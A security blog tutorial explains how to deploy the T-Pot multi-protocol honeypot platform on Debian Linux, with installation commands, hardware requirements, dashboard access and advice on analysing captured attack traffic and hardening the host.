Posted inSecurity

Catching Hackers in the Act: Deploying T-Pot Multi-Protocol Honeypots on Linux

Security tutorial - IT technology blog
Security tutorial - IT technology blog

The Blind Spot in Modern Network Defense

I remember the first time I spun up a public-facing web server for a side project. Within 45 minutes, the logs were already overflowing. Hundreds of unique IP addresses from around the globe were hammering the SSH port with relentless brute-force attempts. My firewall did its job by blocking them, but I realized I was fighting a ghost. I knew that I was being targeted, but I had no idea how the attackers operated or what they wanted.

Most IT professionals operate in this state of digital blindness. We configure firewalls, WAFs, and IDS/IPS systems, feeling a sense of security when we see a “Blocked” status. This is purely reactive. You are defending against known signatures while remaining completely blind to the tools, custom payloads, or zero-day exploits being tested against your perimeter. If you can’t see what an attacker does after they “break in,” you are always playing catch-up.

The Information Asymmetry Problem

Cybersecurity is fundamentally lopsided. An attacker only needs to find one overlooked vulnerability; you have to secure every single entry point. Even worse, attackers use banner grabbing and fingerprinting to identify your exact software versions. Meanwhile, you likely know nothing about their specific methodology.

Passive logging rarely bridges this gap for three reasons:

  • Sanitized Logs: Standard services like Nginx or OpenSSH record connection attempts, but they won’t show you the full sequence of commands a hacker executes post-entry.
  • Zero Interaction: When a firewall drops a connection, the attacker simply moves to the next target. You never see their ultimate objective.
  • Signal vs. Noise: Sifting through 50,000 generic log lines to find one sophisticated exploit is a waste of human capital.

To fix this, we need to flip the script. We need a controlled environment that invites the attacker in, deceives them into thinking they’ve succeeded, and records every keystroke.

Deception Strategies: Choosing Your Bait

Not all honeypots serve the same purpose. Before choosing T-Pot, I looked at three distinct strategies for gathering intelligence.

1. Low-Interaction Honeypots

Tools like Cowrie (for SSH) or Dionaea (for malware) are lightweight. They emulate services rather than offering a full OS. While efficient, they are often easy for seasoned attackers to spot when certain complex commands fail to execute.

2. High-Interaction Honeypots

These involve real systems, such as a vulnerable Windows Server VM. They yield the best data but carry massive risks. If an attacker escapes the VM, they could use your host to launch attacks on third parties, creating a legal nightmare for you.

3. The Multi-Protocol Platform (The T-Pot Approach)

T-Pot offers a middle ground. It uses Docker to run nearly 20 different honeypots—including Cowrie, Honeytrap, and Mailoney—simultaneously on one machine. It bridges the gap between low and high interaction. All the resulting data flows into a centralized ELK stack (Elasticsearch, Logstash, Kibana) for instant visualization.

The Best Approach: Deploying T-Pot on Linux

T-Pot is the fastest way to transform a standard Linux VPS into a threat intelligence hub. It automates containerization, networking, and data visualization. However, don’t underestimate the hardware requirements. Running 20+ containers alongside a resource-heavy ELK stack requires decent hardware.

Prerequisites

  • OS: Debian 11 or 12 (highly recommended).
  • RAM: 8GB is the absolute floor; 16GB is the sweet spot. Anything less than 8GB will lead to frequent kernel panics and Elasticsearch crashes.
  • Disk: 128GB SSD. Logs and indices grow by several gigabytes per day in high-traffic environments.
  • Network: A public IP with no external firewall blocking ports. We want the attackers to have a clear path to our traps.

Step 1: System Preparation

Start with a clean Debian installation. Because T-Pot takes over almost every available port, you need to be careful with your initial setup. Run the standard updates first:

sudo apt update && sudo apt upgrade -y
sudo apt install git -y

Step 2: Cloning and Installing T-Pot

The installation process is almost entirely automated. Clone the official repository and jump into the installer directory:

git clone https://github.com/telekom-security/tpotce
cd tpotce/iso/installer/

Execute the installer script. You will be asked to select an installation type. Choose “Standard.” This includes the full suite of honeypots and the ELK dashboard.

sudo ./install.sh --type=standard

Step 3: Configuration and Security

The installer will prompt you for a web interface username and password. Do not reuse a common password here. Your honeypot will be under constant siege. If your management UI is weak, you’ve just given a hacker a free server.

I suggest using a 32-character random string. You can generate one locally or use a tool like toolcraft.app. Ensure it includes symbols and varied casing.

Warning on SSH: T-Pot moves your real management SSH service to port 64295. The standard port 22 is handed over to Cowrie to trap attackers. If you get disconnected, reconnect using: ssh -p 64295 user@your-ip.

Step 4: Accessing the Dashboard

After the reboot, wait about 15 minutes for the Docker containers to pull and initialize. Access your dashboard at:

https://[your-ip]:64297

The Kibana interface is where the magic happens. You’ll find real-time heatmaps and deep-dive analysis tools. There is also a built-in Cyberchef instance to help you decode any obfuscated payloads you find in the logs.

Analyzing the “Catch”

Leave the system running for 24 hours. When you return to Kibana, the sheer volume of automated malice is usually a shock. On a typical day, a single T-Pot instance might record 30,000 to 50,000 events.

  1. Mass Scanners: You will see constant pings from Shodan, Censys, and various botnets indexing your “vulnerabilities.”
  2. Brute Force: You can watch live as attackers try common credentials like admin/admin or root/123456 on your emulated SSH and RDP ports.
  3. Exploit Payloads: Tools like Dionaea will capture binary malware. T-Pot automatically calculates the MD5/SHA256 hashes of these files. You can drop these hashes into VirusTotal to see exactly what kind of ransomware or botnet agent they were trying to install.

This data is actionable. If you notice a sudden spike in attempts against port 6379 (Redis) or specific Log4j strings, you know exactly what to patch on your production servers before the wave hits them.

Hardening the Host OS

While the honeypots are meant to be messy, the host must stay locked down. I recommend two specific maintenance tasks:

  1. Automated Updates: T-Pot includes an update script in /opt/tpot/bin/. Set this to run via cron to keep your containers fresh.
  2. IP Whitelisting: Use your cloud provider’s security groups to restrict ports 64295 (SSH) and 64297 (Web UI) to your specific office or home IP. There is no reason for the rest of the world to see your management ports.

Deploying a honeypot shifts your mindset from guessing to knowing. It transforms security from a chore into an active defense strategy. Instead of just blocking traffic, you are now gathering the intelligence needed to make your entire network truly resilient.

Share:
Tags: